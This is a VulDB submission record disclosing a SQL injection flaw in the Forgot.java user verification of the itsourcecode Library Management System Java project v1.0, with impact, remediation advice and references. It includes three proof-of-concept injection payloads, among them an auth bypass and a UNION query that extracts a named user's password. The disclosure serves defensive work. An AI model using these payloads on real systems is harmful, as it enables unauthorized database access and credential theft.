| Title | itsourcecode Library Management System Project In Java With Source Code v1.0 SQL Injection |
|---|
| Description | Description:
A SQL injection vulnerability has been discovered in Library Management System Java Project (version <= v1.0). The vulnerability exists in the user verification functionality within library_management/src/Library_Management/Forgot.java. Due to direct concatenation of user input into SQL queries without proper parameterization and input validation, attackers can execute arbitrary SQL commands through maliciously crafted inputs.
Impact:
- Unauthorized access to database information
- Exposure of sensitive information (including user passwords)
- Potential database manipulation and corruption
Technical Details:
1. Vulnerability Type: SQL Injection (CWE-89)
2. Affected Version: v1.0 and below
3. Proof of Concept:
```sql
' OR 1=1 LIMIT 1 #
' UNION SELECT 'admin','compromised','pass',4,5 LIMIT 1 #
' UNION SELECT NULL,(SELECT password FROM account WHERE username='jude'),NULL,NULL,null LIMIT 1 #
```
Remediation:
1. Implement prepared statements
2. Add input validation mechanisms
3. Consider using ORM frameworks
4. Apply principle of least privilege
5. Encrypt sensitive data storage
Severity: High
References:
- OWASP SQL Injection Prevention Guide
- CWE-89: SQL Injection
- CERT Oracle Secure Coding Standard for Java
|
|---|
| Source | ⚠️ https://github.com/wlingze/IRify_scan/issues/1 |
|---|
| User | lingze (UID 83608) |
|---|
| Submission | 04/01/2025 17:26 (1 Year ago) |
|---|
| Moderation | 04/03/2025 21:12 (2 days later) |
|---|
| Status | Accepted |
|---|
| VulDB entry | 303272 [itsourcecode Library Management System 1.0 Forgot.java search txtuname sql injection] |
|---|
| Points | 20 |
|---|